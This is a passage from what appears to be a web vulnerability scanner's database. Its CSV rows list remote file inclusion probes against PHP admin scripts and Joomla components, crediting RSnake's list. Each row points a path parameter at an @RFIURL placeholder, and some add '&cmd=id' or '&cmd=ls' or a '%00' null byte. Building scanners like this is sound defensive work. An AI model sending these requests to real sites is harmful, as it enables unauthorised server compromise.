(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004085\",\"5292\",\"c\",\"/admin/auth/secure.php?cfgProgDir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004086\",\"5292\",\"c\",\"/admin/autoprompter.php?CONFIG[BASE_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004087\",\"5292\",\"c\",\"/admin/bin/patch.php?INSTALL_FOLDER=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004088\",\"5292\",\"c\",\"/admin/catagory.php?language=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004089\",\"5292\",\"c\",\"/admin/classes/pear/OLE/PPS.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004090\",\"5292\",\"c\",\"/admin/classes/pear/OLE/PPS/File.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004091\",\"5292\",\"c\",\"/admin/classes/pear/OLE/PPS/Root.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004092\",\"5292\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004093\",\"5292\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004094\",\"5292\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004095\",\"5292\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004096\",\"5292\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004097\",\"5292\",\"c\",\"/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004098\",\"5292\",\"c\",\"/admin/code/index.php?load_page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004099\",\"5292\",\"c\",\"/admin/comment.php?config[installdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004100\",\"5292\",\"c\",\"/admin/common-menu.php?CONF[local_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004101\",\"5292\",\"c\",\"/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004102\",\"5292\",\"c\",\"/admin/config_settings.tpl.php?include_path=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004103\",\"5292\",\"c\",\"/admin/directory.php?config[installdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004104\",\"5292\",\"c\",\"/admin/doeditconfig.php?thispath=../includes&config[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004105\",\"5292\",\"c\",\"/admin/frontpage_right.php?loadadminpage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004106\",\"5292\",\"c\",\"/admin/header.php?loc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004107\",\"5292\",\"c\",\"/admin/inc/add.php?format_menue=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004108\",\"5292\",\"c\",\"/admin/inc/change_action.php?format_menue=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004109\",\"5292\",\"c\",\"/admin/include/common.php?commonIncludePath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004110\",\"5292\",\"c\",\"/admin/include/header.php?repertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004111\",\"5292\",\"c\",\"/admin/include/header.php?repertoire=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004112\",\"5292\",\"c\",\"/admin/include/lib.module.php?mod_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004113\",\"5292\",\"c\",\"/admin/includes/admin_header.php?level=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004114\",\"5292\",\"c\",\"/admin/includes/admin_header.php?level=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004115\",\"5292\",\"c\",\"/admin/includes/author_panel_header.php?level=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004116\",\"5292\",\"c\",\"/admin/includes/author_panel_header.php?level=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004117\",\"5292\",\"c\",\"/admin/includes/header.php?bypass_installed=1&secure_page_path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004118\",\"5292\",\"c\",\"/admin/includes/spaw/spaw_control.class.php?spaw_root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004119\",\"5292\",\"c\",\"/admin/index.php?path_to_script=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004120\",\"5292\",\"c\",\"/admin/index.php?pg=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004121\",\"5292\",\"c\",\"/admin/index.php?xtrphome=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004122\",\"5292\",\"c\",\"/admin/index_sitios.php?_VIEW=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004123\",\"5292\",\"c\",\"/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004124\",\"5292\",\"c\",\"/admin/login.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004125\",\"5292\",\"c\",\"/admin/news.admin.php?path_to_script=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004126\",\"5292\",\"c\",\"/admin/news.php?language=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004127\",\"5292\",\"c\",\"/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004128\",\"5292\",\"c\",\"/admin/sendmsg.php?config[installdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004129\",\"5292\",\"c\",\"/admin/setup/level2.php?dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004130\",\"5292\",\"c\",\"/admin/system/config/conf-activation.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004131\",\"5292\",\"c\",\"/admin/system/include.php?skindir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004132\",\"5292\",\"c\",\"/admin/system/include.php?start=1&skindir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004133\",\"5292\",\"c\",\"/admin/system/menu/item.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004134\",\"5292\",\"c\",\"/admin/system/modules/conf_modules.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004135\",\"5292\",\"c\",\"/admin/templates/template_thumbnail.php?thumb_template=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004136\",\"5292\",\"c\",\"/admin/testing/tests/0004_init_urls.php?init_path=@RFIURL?&\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004137\",\"5292\",\"c\",\"/admin/themes.php?config[installdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004138\",\"5292\",\"c\",\"/admin/tools/utf8conversion/index.php?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004139\",\"5292\",\"c\",\"/admin/user_user.php?language=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004140\",\"5292\",\"c\",\"/admincp/auth/checklogin.php?cfgProgDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004141\",\"5292\",\"c\",\"/admincp/auth/secure.php?cfgProgDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004142\",\"5292\",\"c\",\"/adminhead.php?path[docroot]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004143\",\"5292\",\"c\",\"/admini/admin.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004144\",\"5292\",\"c\",\"/admini/index.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004145\",\"5292\",\"c\",\"/administrator/admin.php?site_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004146\",\"5292\",\"c\",\"/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004147\",\"5292\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004148\",\"5292\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004149\",\"5292\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004150\",\"5292\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004151\",\"5292\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004152\",\"5292\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004153\",\"5292\",\"c\",\"/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004154\",\"5292\",\"c\",\"/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004155\",\"5292\",\"c\",\"/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004156\",\"5292\",\"c\",\"/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004157\",\"5292\",\"c\",\"/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004158\",\"5292\",\"c\",\"/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004159\",\"5292\",\"c\",\"/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004160\",\"5292\",\"c\",\"/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004161\",\"5292\",\"c\",\"/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004162\",\"5292\",\"c\",\"/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004163\",\"5292\",\"c\",\"/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004164\",\"5292\",\"c\",\"/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004165\",\"5292\",\"c\",\"/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004166\",\"5292\",\"c\",\"/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004167\",\"5292\",\"c\",\"/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004168\",\"5292\",\"c\",\"/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004169\",\"5292\",\"c\",\"/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004170\",\"5292\",\"c\",\"/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004171\",\"5292\",\"c\",\"/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004172\",\"5292\",\"c\",\"/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004173\",\"5292\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004174\",\"5292\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004175\",\"5292\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004176\",\"5292\",\"c\",\"/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004177\",\"5292\",\"c\",\"/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004178\",\"5292\",\"c\",\"/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004179\",\"5292\",\"c\",\"/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004180\",\"5292\",\"c\",\"/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004181\",\"5292\",\"c\",\"/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004182\",\"5292\",\"c\",\"/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004183\",\"5292\",\"c\",\"/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004184\",\"5292\",\"c\",\"/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004185\",\"5292\",\"c\",\"/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004186\",\"5292\",\"c\",\"/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004187\",\"5292\",\"c\",\"/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004188\",\"5292\",\"c\",\"/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004189\",\"5292\",\"c\",\"/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004190\",\"5292\",\"c\",\"/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004191\",\"5292\",\"c\",\"/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004192\",\"5292\",\"c\",\"/administrator/components/com_jreactions/langset.php?comPath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004193\",\"5292\",\"c\",\"/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004194\",\"5292\",\"c\",\"/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 